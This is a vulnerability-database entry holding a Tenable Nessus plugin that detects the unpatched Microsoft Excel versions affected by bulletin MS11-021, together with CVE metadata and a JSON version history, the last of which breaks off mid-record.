MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)
2011-04-13T00:00:00
ID SMB_NT_MS11-021.NASL Type nessus Reporter This script is Copyright (C) 2011-2018 Tenable Network Security, Inc. Modified 2019-12-02T00:00:00
Description
The remote Windows host is running a version of Microsoft Excel or
Excel Viewer that is affected by several vulnerabilities.
If an attacker can trick a user on the affected host into opening a
specially crafted Excel file, they could leverage this issue to
execute arbitrary code subject to the user
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(53378);
script_version("1.27");
script_cvs_date("Date: 2018/11/15 20:50:30");
script_cve_id(
"CVE-2011-0097",
"CVE-2011-0098",
"CVE-2011-0101",
"CVE-2011-0103",
"CVE-2011-0104",
"CVE-2011-0105",
"CVE-2011-0978",
"CVE-2011-0979",
"CVE-2011-0980"
);
script_bugtraq_id(46225, 46226, 46229, 47201, 47235, 47243, 47244, 47245, 47256);
script_xref(name:"EDB-ID", value:"18067");
script_xref(name:"EDB-ID", value:"18087");
script_xref(name:"MSFT", value:"MS11-021");
script_xref(name:"MSKB", value:"2464583");
script_xref(name:"MSKB", value:"2466146");
script_xref(name:"MSKB", value:"2466156");
script_xref(name:"MSKB", value:"2466158");
script_xref(name:"MSKB", value:"2466169");
script_xref(name:"MSKB", value:"2502786");
script_name(english:"MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)");
script_summary(english:"Checks version of Excel");
script_set_attribute(
attribute:"synopsis",
value:
"Arbitrary code can be executed on the remote host through Microsoft
Excel."
);
script_set_attribute(
attribute:"description",
value:
"The remote Windows host is running a version of Microsoft Excel or
Excel Viewer that is affected by several vulnerabilities.
If an attacker can trick a user on the affected host into opening a
specially crafted Excel file, they could leverage this issue to
execute arbitrary code subject to the user's privileges."
);
script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-021");
script_set_attribute(
attribute:"solution",
value:
"Microsoft has released a set of patches for Office XP, 2003, 2007,
2010, Excel Viewer, and Office Compatability Pack."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'White_Phosphorus');
script_set_attribute(attribute:"vuln_publication_date", value:"2011/02/07");
script_set_attribute(attribute:"patch_publication_date", value:"2011/04/12");
script_set_attribute(attribute:"plugin_publication_date", value:"2011/04/13");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:office");
script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:excel");
script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:excel_viewer");
script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:office_compatibility_pack");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Windows : Microsoft Bulletins");
script_copyright(english:"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.");
script_dependencies("smb_nt_ms02-031.nasl", "office_installed.nasl", "smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl");
script_require_keys("SMB/MS_Bulletin_Checks/Possible");
script_require_ports(139, 445, 'Host/patch_management_checks');
exit(0);
}
include("smb_hotfixes_fcheck.inc");
include("smb_hotfixes.inc");
include("smb_func.inc");
include("misc_func.inc");
include("audit.inc");
get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");
bulletin = 'MS11-021';
kbs = make_list("2464583", "2466146", "2466156", "2466158", "2466169", "2502786");
if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);
info = "";
# Excel.
vuln = 0;
installs = get_kb_list("SMB/Office/Excel/*/ProductPath");
if (!isnull(installs))
{
foreach install (keys(installs))
{
version = install - 'SMB/Office/Excel/' - '/ProductPath';
path = installs[install];
ver = split(version, sep:'.', keep:FALSE);
for (i=0; i<max_index(ver); i++)
ver[i] = int(ver[i]);
# Excel 2010.
office_sp = get_kb_item("SMB/Office/2010/SP");
if (
(!isnull(office_sp) && office_sp == 0) &&
(
(ver[0] == 14 && ver[1] == 0 && ver[2] < 5130) ||
(ver[0] == 14 && ver[1] == 0 && ver[2] == 5130 && ver[3] < 5003)
)
)
{
vuln++;
info =
'\n Product : Excel 2010' +
'\n File : ' + path +
'\n Installed version : ' + version +
'\n Fixed version : 14.0.5130.5003\n';
hotfix_add_report(info, bulletin:bulletin, kb:'2466146');
}
# Excel 2007.
office_sp = get_kb_item("SMB/Office/2007/SP");
if (
(!isnull(office_sp) && office_sp == 2) &&
(
(ver[0] == 12 && ver[1] == 0 && ver[2] < 6550) ||
(ver[0] == 12 && ver[1] == 0 && ver[2] == 6550 && ver[3] < 5004)
)
)
{
vuln++;
info =
'\n Product : Excel 2007' +
'\n File : ' + path +
'\n Installed version : ' + version +
'\n Fixed version : 12.0.6550.5004\n';
hotfix_add_report(info, bulletin:bulletin, kb:"2464583");
}
# Excel 2003.
office_sp = get_kb_item("SMB/Office/2003/SP");
if (
(!isnull(office_sp) && office_sp == 3) &&
(ver[0] == 11 && ver[1] == 0 && ver[2] < 8332)
)
{
vuln++;
info =
'\n Product : Excel 2003' +
'\n File : ' + path +
'\n Installed version : ' + version +
'\n Fixed version : 11.0.8332.0\n';
hotfix_add_report(info, bulletin:bulletin, kb:"2502786");
}
# Excel 2002.
if (
(!isnull(office_sp) && office_sp == 3) &&
(ver[0] == 10 && ver[1] == 0 && ver[2] < 6869)
)
{
vuln++;
info =
'\n Product : Excel 2002' +
'\n File : ' + path +
'\n Installed version : ' + version +
'\n Fixed version : 10.0.6869.0\n';
hotfix_add_report(info, bulletin:bulletin, kb:"2466169");
}
}
}
# Excel Viewer.
installs = get_kb_list("SMB/Office/ExcelViewer/*/ProductPath");
if (!isnull(installs))
{
foreach install (keys(installs))
{
version = install - 'SMB/Office/ExcelViewer/' - '/ProductPath';
path = installs[install];
path = 'n/a';
ver = split(version, sep:'.', keep:FALSE);
for (i=0; i<max_index(ver); i++)
ver[i] = int(ver[i]);
# Excel Viewer.
if (
ver[0] == 12 && ver[1] == 0 &&
(
ver[2] < 6550 ||
(ver[2] == 6550 && ver[3] < 5004)
)
)
{
vuln++;
info =
'\n Product : Excel Viewer' +
'\n File : '+ path +
'\n Installed version : '+ version +
'\n Fixed version : 12.0.6550.5004\n';
hotfix_add_report(info, bulletin:bulletin, kb:"2466158");
break;
}
}
}
# 2007 Microsoft Office system and the Microsoft Office Compatibility Pack.
installs = get_kb_list("SMB/Office/ExcelCnv/*/ProductPath");
if (!isnull(installs))
{
foreach install (keys(installs))
{
version = install - 'SMB/Office/ExcelCnv/' - '/ProductPath';
path = installs[install];
ver = split(version, sep:'.', keep:FALSE);
for (i=0; i<max_index(ver); i++)
ver[i] = int(ver[i]);
# 2007 Office system and the Office Compatibility Pack.
if (
ver[0] == 12 && ver[1] == 0 &&
(
ver[2] < 6550 ||
(ver[2] == 6550 && ver[3] < 5004)
)
)
{
vuln++;
info =
'\n Product : 2007 Office system and the Office Compatibility Pack' +
'\n File : '+ path +
'\n Installed version : '+ version +
'\n Fixed version : 12.0.6550.5004\n';
hotfix_add_report(info, bulletin:bulletin, kb:"2466156");
break;
}
}
}
if (vuln)
{
set_kb_item(name:"SMB/Missing/"+bulletin, value:TRUE);
hotfix_security_hole();
exit(0);
}
else audit(AUDIT_HOST_NOT, 'affected');
{"id": "SMB_NT_MS11-021.NASL", "bulletinFamily": "scanner", "title": "MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)", "description": "The remote Windows host is running a version of Microsoft Excel or\nExcel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Excel file, they could leverage this issue to\nexecute arbitrary code subject to the user", "published": "2011-04-13T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/53378", "reporter": "This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-021"], "cvelist": ["CVE-2011-0097", "CVE-2011-0979", "CVE-2011-0105", "CVE-2011-0098", "CVE-2011-0978", "CVE-2011-0103", "CVE-2011-0101", "CVE-2011-0104", "CVE-2011-0980"], "type": "nessus", "lastseen": "2019-12-13T09:17:57", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:microsoft:excel_viewer", "cpe:/a:microsoft:office", "cpe:/a:microsoft:excel", "cpe:/a:microsoft:office_compatibility_pack"], "cvelist": ["CVE-2011-0097", "CVE-2011-0979", "CVE-2011-0105", "CVE-2011-0098", "CVE-2011-0978", "CVE-2011-0103", "CVE-2011-0101", "CVE-2011-0104", "CVE-2011-0980"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The remote Windows host is running a version of Microsoft Excel or\nExcel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Excel file, they could leverage this issue to\nexecute arbitrary code subject to the user", "edition": 12, "enchantments": {"dependencies": {"modified": "2019-11-03T12:15:45", "references": [{"idList": ["CVE-2011-0097", "CVE-2011-0979", "CVE-2011-0105", "CVE-2011-0098", "CVE-2011-0978", "CVE-2011-0103", "CVE-2011-0101", "CVE-2011-0104", "CVE-2011-0980"], "type": "cve"}, {"idList": ["SMNTC-47235", "SMNTC-47244", "SMNTC-47245"], "type": "symantec"}, {"idList": ["ZDI-11-120", "ZDI-11-042", "ZDI-11-040", "ZDI-11-121", "ZDI-11-041"], "type": "zdi"}, {"idList": ["MACOSX_MS_OFFICE_APR2011.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:1361412562310902410", "OPENVAS:1361412562310801597", "OPENVAS:801595", "OPENVAS:902410", "OPENVAS:801597", "OPENVAS:1361412562310801595"], "type": "openvas"}, {"idList": ["SSV:72308", "SSV:20473", "SSV:20502", "SSV:20482", "SSV:20487", "SSV:20484", "SSV:20507", "SSV:20486"], "type": "seebug"}, {"idList": ["PACKETSTORM:106665", "PACKETSTORM:100978"], "type": "packetstorm"}, {"idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS11_021_XLB_BOF"], "type": "metasploit"}, {"idList": ["SECURITYVULNS:VULN:11580", "SECURITYVULNS:DOC:26108", "SECURITYVULNS:DOC:26146", "SECURITYVULNS:DOC:26111", "SECURITYVULNS:DOC:26115"], "type": "securityvulns"}, {"idList": ["EDB-ID:17227", "EDB-ID:35573", "EDB-ID:18087"], "type": "exploitdb"}, {"idList": ["SAINT:7B206168EE040415028D1ACACF7854DD", "SAINT:8FDD1727EA3EF9E282DFCB5EB73BAB71", "SAINT:013CEB50A5B7225D03F444037190A7BC", "SAINT:AD5D5006868071901513DB0CC581B4BC", "SAINT:CBF7317F9C70B260229D429B6501B612", "SAINT:267E40AEADBF5F2FFB79C86829E9CD8F"], "type": "saint"}]}, "score": {"modified": "2019-11-03T12:15:45", "value": 10.0, "vector": "NONE"}}, "hash": "14b00652be0937067aa3d2416285283047cb7e4d535827fc75a51a46e5a289fc", "hashmap": [{"hash": "15bc6dc844e4b9ecee34f343b0fae75b", "key": "published"}, {"hash": "c873ceb88c2733918d5085d12ea543fb", "key": "pluginID"}, {"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "8fe7795fca489b4a41cbd4de490e37d5", "key": "title"}, {"hash": "79f17a293f21a006f4d5fb6cc7e3ddf9", "key": "description"}, {"hash": "84cda5fc850fc23ca8b34a300dcb0086", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "c634e415711c2c395379a3376b7cb08e", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "faedb438011c10b2b3ac9682e0ad6e9a", "key": "cvelist"}, {"hash": "33343e1ae53d3b18311f8f7cae2b7529", "key": "reporter"}, {"hash": "7f1e40a1c2c26f9b1d7fb1fd6a4ba40b", "key": "sourceData"}, {"hash": "6f0aa299e212a46ad7694743f103ff67", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/53378", "id": "SMB_NT_MS11-021.NASL", "lastseen": "2019-11-03T12:15:45", "modified": "2019-11-02T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "53378", "published": "2011-04-13T00:00:00", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-021"], "reporter": "This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53378);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\n \"CVE-2011-0097\",\n \"CVE-2011-0098\",\n \"CVE-2011-0101\",\n \"CVE-2011-0103\",\n \"CVE-2011-0104\",\n \"CVE-2011-0105\",\n \"CVE-2011-0978\",\n \"CVE-2011-0979\",\n \"CVE-2011-0980\"\n );\n script_bugtraq_id(46225, 46226, 46229, 47201, 47235, 47243, 47244, 47245, 47256);\n script_xref(name:\"EDB-ID\", value:\"18067\");\n script_xref(name:\"EDB-ID\", value:\"18087\");\n script_xref(name:\"MSFT\", value:\"MS11-021\");\n script_xref(name:\"MSKB\", value:\"2464583\");\n script_xref(name:\"MSKB\", value:\"2466146\");\n script_xref(name:\"MSKB\", value:\"2466156\");\n script_xref(name:\"MSKB\", value:\"2466158\");\n script_xref(name:\"MSKB\", value:\"2466169\");\n script_xref(name:\"MSKB\", value:\"2502786\");\n\n script_name(english:\"MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)\");\n script_summary(english:\"Checks version of Excel\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nExcel.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host is running a version of Microsoft Excel or\nExcel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Excel file, they could leverage this issue to\nexecute arbitrary code subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-021\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Office XP, 2003, 2007,\n2010, Excel Viewer, and Office Compatability Pack.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel_viewer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_compatibility_pack\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nt_ms02-031.nasl\", \"office_installed.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS11-021';\nkbs = make_list(\"2464583\", \"2466146\", \"2466156\", \"2466158\", \"2466169\", \"2502786\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\ninfo = \"\";\n\n\n# Excel.\nvuln = 0;\ninstalls = get_kb_list(\"SMB/Office/Excel/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/Excel/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel 2010.\n office_sp = get_kb_item(\"SMB/Office/2010/SP\");\n if (\n (!isnull(office_sp) && office_sp == 0) &&\n (\n (ver[0] == 14 && ver[1] == 0 && ver[2] < 5130) ||\n (ver[0] == 14 && ver[1] == 0 && ver[2] == 5130 && ver[3] < 5003)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2010' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.0.5130.5003\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:'2466146');\n }\n # Excel 2007.\n office_sp = get_kb_item(\"SMB/Office/2007/SP\");\n if (\n (!isnull(office_sp) && office_sp == 2) &&\n (\n (ver[0] == 12 && ver[1] == 0 && ver[2] < 6550) ||\n (ver[0] == 12 && ver[1] == 0 && ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2007' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2464583\");\n }\n # Excel 2003.\n office_sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 8332)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2003' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 11.0.8332.0\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2502786\");\n }\n # Excel 2002.\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 10 && ver[1] == 0 && ver[2] < 6869)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2002' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 10.0.6869.0\\n';\n\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466169\");\n }\n }\n}\n\n# Excel Viewer.\ninstalls = get_kb_list(\"SMB/Office/ExcelViewer/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelViewer/' - '/ProductPath';\n path = installs[install];\n path = 'n/a';\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel Viewer.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel Viewer' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466158\");\n break;\n }\n }\n}\n\n\n# 2007 Microsoft Office system and the Microsoft Office Compatibility Pack.\ninstalls = get_kb_list(\"SMB/Office/ExcelCnv/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelCnv/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # 2007 Office system and the Office Compatibility Pack.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : 2007 Office system and the Office Compatibility Pack' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466156\");\n break;\n }\n }\n}\n\nif (vuln)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "title": "MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)", "type": "nessus", "viewCount": 8}, "differentElements": ["modified"], "edition": 12, "lastseen": "2019-11-03T12:15:45"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2011-0097", "CVE-2011-0979", "CVE-2011-0105", "CVE-2011-0098", "CVE-2011-0978", "CVE-2011-0103", "CVE-2011-0101", "CVE-2011-0104", "CVE-2011-0980"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote Windows host is running a version of Microsoft Excel or Excel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a specially crafted Excel file, they could leverage this issue to execute arbitrary code subject to the user's privileges.", "edition": 1, "hash": "2de1fb55aadb9393b0a6c99a994c3556088653f61236e84678c4e2510b90770e", "hashmap": [{"hash": "15bc6dc844e4b9ecee34f343b0fae75b", "key": "published"}, {"hash": "c873ceb88c2733918d5085d12ea543fb", "key": "pluginID"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "01e60114ce7d9a878cc02ee9dca9a3ef", "key": "description"}, {"hash": "a33e65a768b0cca01f769a54f9f4ed8b", "key": "cvss"}, {"hash": "8fe7795fca489b4a41cbd4de490e37d5", "key": "title"}, {"hash": "b677765cf0e8a9219ef3a21e6d3758c2", "key": "references"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "a61712667bf2efec10d869786359bb01", "key": "modified"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "faedb438011c10b2b3ac9682e0ad6e9a", "key": "cvelist"}, {"hash": "3535c4b9b587836070fbecf269b20eef", "key": "sourceData"}, {"hash": "35f671787437d7463153fdc04e473d41", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=53378", "id": "SMB_NT_MS11-021.NASL", "lastseen": "2016-09-26T17:23:16", "modified": "2016-01-28T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.2", "pluginID": "53378", "published": "2011-04-13T00:00:00", "references": ["https://technet.microsoft.com/library/security/MS11-021"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53378);\n script_version(\"$Revision: 1.23 $\");\n script_cvs_date(\"$Date: 2016/01/28 22:37:17 $\");\n\n script_cve_id(\n \"CVE-2011-0097\",\n \"CVE-2011-0098\",\n \"CVE-2011-0101\",\n \"CVE-2011-0103\",\n \"CVE-2011-0104\",\n \"CVE-2011-0105\",\n \"CVE-2011-0978\",\n \"CVE-2011-0979\",\n \"CVE-2011-0980\"\n );\n script_bugtraq_id(46225, 46226, 46229, 47201, 47235, 47243, 47244, 47245, 47256);\n script_osvdb_id(\n 70811,\n 70812,\n 70904,\n 71758,\n 71759,\n 71760,\n 71761,\n 71765,\n 71766\n );\n script_xref(name:\"EDB-ID\", value:\"18067\");\n script_xref(name:\"EDB-ID\", value:\"18087\");\n script_xref(name:\"MSFT\", value:\"MS11-021\");\n\n script_name(english:\"MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)\");\n script_summary(english:\"Checks version of Excel\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nExcel.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host is running a version of Microsoft Excel or\nExcel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Excel file, they could leverage this issue to\nexecute arbitrary code subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/MS11-021\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Office XP, 2003, 2007,\n2010, Excel Viewer, and Office Compatability Pack.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_set_attribute(attribute:\"metasploit_name\", value:'MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel_viewer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_compatibility_pack\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nt_ms02-031.nasl\", \"office_installed.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS11-021';\nkbs = make_list(\"2464583\", \"2466146\", \"2466156\", \"2466158\", \"2466169\", \"2502786\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\ninfo = \"\";\n\n\n# Excel.\nvuln = 0;\ninstalls = get_kb_list(\"SMB/Office/Excel/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/Excel/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel 2010.\n office_sp = get_kb_item(\"SMB/Office/2010/SP\");\n if (\n (!isnull(office_sp) && office_sp == 0) &&\n (\n (ver[0] == 14 && ver[1] == 0 && ver[2] < 5130) ||\n (ver[0] == 14 && ver[1] == 0 && ver[2] == 5130 && ver[3] < 5003)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2010' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.0.5130.5003\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:'2466146');\n }\n # Excel 2007.\n 